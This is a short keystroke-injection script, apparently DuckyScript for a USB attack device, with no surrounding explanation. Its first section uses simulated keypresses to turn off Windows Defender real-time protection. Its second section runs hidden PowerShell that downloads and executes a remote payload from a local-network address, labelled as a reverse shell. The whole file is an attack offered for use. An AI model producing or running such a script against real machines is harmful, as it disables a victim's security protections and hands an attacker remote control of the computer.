REM *******************************************
REM *** Disable defender - real time protection
REM *******************************************
DELAY 1000
CTRL ESC
DELAY 300
STRING windows security
DELAY 300
ENTER
DELAY 1000
ENTER
TAB
TAB
TAB
TAB
DELAY 300
ENTER
DELAY 600
SPACE
DELAY 600
LEFT
ENTER
DELAY 300
ALT F4
REM *********************************
REM *** Execute the reverse shell ***
REM *********************************
GUI r
DELAY 600
STRING powershell -w hidden "IEX (New-Object Net.WebClient).DownloadString('http://192.168.118.131/payload.ps1');"
ENTER
DELAY 600
LEFT ENTER
